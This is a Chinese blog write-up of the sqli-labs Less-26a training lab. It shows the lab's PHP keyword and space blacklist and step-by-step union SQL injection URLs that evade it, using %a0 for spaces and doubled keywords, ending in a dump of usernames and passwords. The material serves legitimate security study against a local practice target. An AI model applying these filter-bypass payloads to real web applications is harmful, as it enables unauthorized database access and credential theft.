• Sqli-labs Less-26a 绕过 or、and、注释符、空格、斜杠过滤 union注入


    关键代码

    function blacklist($id)
    {
        $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
        $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
        $id= preg_replace('/[/*]/',"", $id);        //strip out /*
        $id= preg_replace('/[--]/',"", $id);        //Strip out --
        $id= preg_replace('/[#]/',"", $id);            //Strip out #
        $id= preg_replace('/[s]/',"", $id);        //Strip out spaces
        $id= preg_replace('/[s]/',"", $id);        //Strip out spaces
        $id= preg_replace('/[/\\]/',"", $id);        //Strip out slashes
        return $id;
    }
    $id=$_GET['id'];
    $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
    //print_r(mysql_error());

    这关与less26的区别在于,sql语句添加了一个括号,同时在sql语句执行抛出错误后并不在前台页面输出。所以我们排除报错注入,这里利用union注入。

    我们构造payload:

    http://127.0.0.1/sqllib/Less-26a/?id=100')union%a0select%a01,2,3||('1

    Explain:基础与less26一致,我们直接用 ') 闭合前面的,然后跟上自己构造的注入语句即可。最后利用('1 进行闭合即可。

    1、爆当前数据库

    http://127.0.0.1/sql/Less-26a/?id=100')union select 1,database(),('3

    将空格替换为%a0

    http://127.0.0.1/sql/Less-26a/?id=100')union%a0select%a01,database(),('3

    2、爆数据库

    http://127.0.0.1/sql/Less-26a/?id=100')union select 1,(select group_concat(schema_name) from information_schema.schemata),('3

    将空格替换为%a0,将information_schema替换为infoorrmation_schema

    http://127.0.0.1/sql/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(schema_name)%a0from%a0infoorrmation_schema.schemata),('3

    3、爆数据表

    http://127.0.0.1/sql/Less-26a/?id=100')union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),('3

    将空格替换为%a0,将information_schema替换为infoorrmation_schema

    http://127.0.0.1/sql/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema='security'),('3

    4、爆数据列

    http://127.0.0.1/sql/Less-26a/?id=100')union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),('3

    将空格替换为%a0,将information_schema替换为infoorrmation_schema,将and替换为aandnd

    http://127.0.0.1/sql/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(column_name)%a0from%a0infoorrmation_schema.columns%a0where%a0table_schema='security'%a0aandnd%a0table_name='users'),('3

    5、爆内容

    http://127.0.0.1/sql/Less-26a/?id=100')union select 1,(select group_concat(username,0x3a,password) from users),('3

    将空格替换为%a0,将password替换为passwoorrd

    http://127.0.0.1/sql/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(username,0x3a,passwoorrd)%a0from%a0security.users),('3

  • 相关阅读:
    golang 带参数 发送、上传本地文件到其他机器、服务器
    【比赛游记】北大集训2020垫底记
    【比赛游记】NOIP2020又当工具人记
    AtCoder Regular Contest 107
    AtCoder Regular Contest 108
    【比赛游记】CSP2020游记
    注意事项
    2020北大集训摸鱼记
    NOIP2020游记
    ARC109F
  • 原文地址:https://www.cnblogs.com/zhengna/p/12655081.html
Copyright © 2020-2023  润新知